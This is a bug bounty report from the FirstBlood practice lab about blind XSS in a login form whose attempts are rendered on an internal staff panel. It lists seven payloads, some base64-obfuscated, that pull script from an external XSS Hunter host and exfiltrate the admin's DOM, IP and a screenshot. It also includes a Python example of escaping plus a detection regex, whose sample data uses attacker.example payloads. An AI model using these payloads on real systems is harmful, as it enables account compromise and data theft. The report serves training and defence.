FirstBlood #1310: Blind XSS on login page disclosing admin panel access
This issue was discovered on FirstBlood v3

On 2022-12-09, ar6aaz Level 3 reported:

Hello Team,

I have found a Blind XSS vulnerability on FirstBlood v3. When you visit the login page, you will notice the message "Login attempts will be logged".

That made me think there could either be a Blind XSS or Log4j bug here. The application being built on PHP rules out Log4j, so I tried Blind XSS and it worked.

Steps to Reproduce:

  1. Go to the login page.
  2. Enter Blind XSS payload in the username/password fields.

You will receive a notification of your Blind XSS being fired in your inbox. The XSS fires on https://firstblood-helper.com/login_attempts.php?id=9056

You can create Blind XSS payloads by self-hosting XSS Hunter or by using an account on https://xsshunter.com. Some sample payloads that worked for me:

  1. "><script src=https://a6zxssht.xss.ht></script>
  2. javascript:eval('var a=document.createElement(\'script\');a.src=\'https://a6zxssht.xss.ht\';document.body.appendChild(a)')
  3. "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
  4. "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>
  5. "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
  6. "><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://a6zxssht.xss.ht";parent.document.body.appendChild(a);</script>">
  7. <script>$.getScript("//a6zxssht.xss.ht")</script>

Impact: We are able to get a screenshot of the admin panel where the XSS fires for the user Administrator-Sean. Along with that, the Blind XSS also leaks other information such as:

  1. IP address: https://www.ip-tracker.org/lookup.php?ip=86.145.182.70
  2. Entire DOM data
  3. Screenshot of Admin panel:

P1 CRITICAL

Endpoint: /login.php

Parameter: username/password

Payload: "><script src=https://a6zxssht.xss.ht></script>
FirstBlood ID: 72
Vulnerability Type: Stored XSS

Login attempts were logged on an internal panel on firstblood-helper.com, and the username is vulnerable to blind XSS affecting FirstBlood staff.
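The root cause described above is a staff-facing log viewer that echoes the submitted username into HTML without encoding. The following is an added example written for this page, not code from the report or from FirstBlood itself (which is PHP; the equivalent call there is htmlspecialchars). It assumes a minimal Python viewer, shows the unsafe rendering beside the encoded one, and adds a triage heuristic that flags stored login attempts containing markup so defenders can spot this pattern in their own logs. The log entries are constructed sample data.

```python
import html
import re

# Constructed sample login-attempt records, shaped like what a "login attempts
# will be logged" feature would store. Hostnames and IPs are placeholders.
SAMPLE_ATTEMPTS = [
    {"id": 1, "username": "alice", "ip": "192.0.2.10"},
    {"id": 2, "username": '"><script src=https://attacker.example/x.js></script>', "ip": "192.0.2.11"},
    {"id": 3, "username": '"><img src=x onerror=eval(atob(this.id)) id=PLACEHOLDER>', "ip": "192.0.2.12"},
]


def render_row_unsafe(attempt: dict) -> str:
    """The vulnerable pattern: untrusted username concatenated straight into HTML.
    Anything the attacker typed into the login form becomes live markup for staff."""
    return (
        f'<tr><td>{attempt["id"]}</td>'
        f'<td>{attempt["username"]}</td>'
        f'<td>{attempt["ip"]}</td></tr>'
    )


def render_row_safe(attempt: dict) -> str:
    """The fix: HTML-encode every value at the point it is written into the page.
    quote=True also encodes ' and " so the value cannot break out of attributes."""
    esc = lambda v: html.escape(str(v), quote=True)
    return (
        f'<tr><td>{esc(attempt["id"])}</td>'
        f'<td>{esc(attempt["username"])}</td>'
        f'<td>{esc(attempt["ip"])}</td></tr>'
    )


# Triage heuristic for stored records: tag openers, javascript: URLs,
# inline event handlers and srcdoc. This is for detection and review of
# existing logs, not a substitute for output encoding.
MARKUP_PATTERN = re.compile(r'<[a-zA-Z/!]|javascript:|\bon[a-z]+\s*=|srcdoc\s*=', re.IGNORECASE)


def flag_suspicious(attempts: list) -> list:
    """Return the ids of login attempts whose username looks like injected markup."""
    return [a["id"] for a in attempts if MARKUP_PATTERN.search(a["username"])]


if __name__ == "__main__":
    for a in SAMPLE_ATTEMPTS:
        print("unsafe:", render_row_unsafe(a))
        print("safe:  ", render_row_safe(a))
    print("flagged ids:", flag_suspicious(SAMPLE_ATTEMPTS))
```

Encoding on output is the fix that removes the bug regardless of what was stored; a Content-Security-Policy on the internal panel that disallows remote script sources would additionally stop the exfiltration step even if an encoding gap remains. The regex heuristic is only for reviewing logs that have already been collected and will produce some false positives on ordinary usernames.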

Report Feedback

@zseano

Creator & Administrator

Congratulations, you were the second user to report this! For finding this you have won yourself a LIMITED edition BugBountyHunter hat!